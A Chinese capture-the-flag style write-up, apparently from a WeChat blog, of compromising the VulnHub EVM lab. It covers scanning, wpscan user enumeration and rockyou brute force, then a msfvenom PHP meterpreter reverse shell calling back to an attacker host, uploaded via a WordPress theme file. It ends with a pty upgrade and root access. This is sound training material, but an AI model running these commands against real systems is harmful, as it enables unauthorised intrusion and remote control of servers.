本周末实践的是vulnhub的EVM镜像,下载地址,https://download.vulnhub.com/evm/EVM.ova,还是能用workstation打开,但是扫描不到地址,应该还是网卡名字又不对了,只能用virtuabox再重新导入,再次地址扫描就有了,
sudo netdiscover -r 192.168.1.0/24,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.1.107,
有http服务,那就再接着来个目录爆破,sudo dirb http://192.168.1.107,
看到是wordpress,浏览器访问一下试试,
诡异啊,竟然被重定向到了192.168.56.103上,这就得让靶机拿到192.168.56.103才行啊,于是调整了路由器dhcp的网段和网关,并给靶机的mac绑定了192.168.56.103,这回就没问题了,
地址扫描和端口扫描以及目录爆破就不重复了,直接上wpscan吧,
sudo wpscan --url http://192.168.56.103/wordpress -e vp,vt,u,
看到有个账号,那就爆破一下,
sudo wpscan --url http://192.168.56.103/wordpress -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt,
得到了账号的密码:c0rrupt3d_brain / 24992499,
登录进去看看,发现了一个能上传web shell的地方,
先在攻击机kali上开个meterpreter shell监听,
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.56.106
set LPORT 4444
run
再造个web shell脚本,
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.106 LPORT=4444 R > shell.php,
把web shell脚本贴进去并上传,
在外面访问web shell地址,
http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/404.php,
这就能在监听上看到meterpreter shell过来了,
不是root,需要提权,转成交互式shell,
python -c 'import pty; pty.spawn("/bin/bash")',
找到了隐藏的root密码文件,切换root成功,
本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之EVM的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论